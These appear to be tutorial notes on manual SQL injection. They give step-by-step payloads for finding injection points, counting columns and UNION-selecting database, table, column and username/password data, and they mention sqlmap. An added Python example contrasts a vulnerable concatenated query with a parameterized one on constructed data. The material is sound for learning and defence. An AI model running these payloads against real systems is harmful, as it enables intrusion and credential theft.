Part one: the general approach to simple manual SQL injection (notes)
1. Check whether there is an injection point (string or numeric)
2. Determine the number of fields (columns)
3. Check whether a UNION query can be used (whether there is a display position)
4. Get all database names
5. Get the table names in the database
6. Get the column names in the table
7. Get the data in the columns
1. Check whether there is an injection point
* Single quote ('): if it produces an error, injection may be possible
Enter 2-1 as the parameter value and see whether the page changes (numeric)
* Numeric: and 1=1 normal; and 1=2 error
or 2>1 normal; or 1>2 error
xor 1=1 error; xor 1=2 normal
and 1=1 URL-encoded: %41%4E%44%20%31%3D%31
-0: page unchanged; -1: error page
* String: close the single quote (or double quote, parenthesis)
Then append #; %27; -- (and +) and check whether the quote is closed
' and '1'='1 normal; ' and '1'='2 error
* String terminators: --; #; %23; %00; /*
Termination patterns: --, '--, ')--, )--, '))--, ))--
2. Determine the number of fields
1' order by 1 --+
1' order by 2 --+
... until an error occurs
(For numeric injection, the parameter is not wrapped in single quotes)
3. Check whether a UNION query can be used (whether there is a display position)
1' union select 1,2,3... --+
4. Get all database names
1' union select 1,2,database() --+
@@basedir: database installation path
@@datadir: database data directory
version(): database version
user(): current database user
database(): name of the database currently in use
5. Get the table names in the database
id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
6. Get the columns of a table
id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
7. Get the data in the columns
id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
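As an added example (not part of these notes), the step-7 UNION payload run against a lookup built by string concatenation and against the same lookup using a placeholder, on an in-memory SQLite database with constructed rows. SQLite stands in for MySQL here, so group_concat is replaced by plain columns; the news/users tables and column names are assumed.

```python
import sqlite3

# Constructed in-memory schema standing in for the application's tables.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'hello', 'first post')")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "hash-a"), (2, "bob", "hash-b")])
    return conn

def lookup_vulnerable(conn, id_param):
    # The request parameter is spliced into the SQL text, so a single quote
    # closes the literal and the rest of the value is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = '%s'" % id_param
    return conn.execute(sql).fetchall()

def lookup_safe(conn, id_param):
    # A placeholder sends the value as data; the quote and the UNION stay
    # inside the string value and never reach the parser as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()

# Step-7 payload from the notes in SQLite syntax; "-- " comments out the
# closing quote that the vulnerable query appends after the parameter.
PAYLOAD = "0' union select id, username, password from users -- "

def demo():
    conn = make_db()
    return {
        "normal": lookup_safe(conn, "1"),
        "vulnerable": sorted(lookup_vulnerable(conn, PAYLOAD)),
        "safe": lookup_safe(conn, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The concatenated query returns every users row through the news display positions, while the parameterized one returns nothing, because the whole payload is compared as one literal id value.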
Part two: other simple injections
1. Search box
Search for ', &, [, ], %, $, @ and other special characters; if the page returns normally, injection may be possible
%' and 1=1 and '%'='% ; %' and 1=2 and '%'='%
2. Login box
Using # and -- has no effect, but using \ causes an error; at that point run sqlmap, as there may be an injection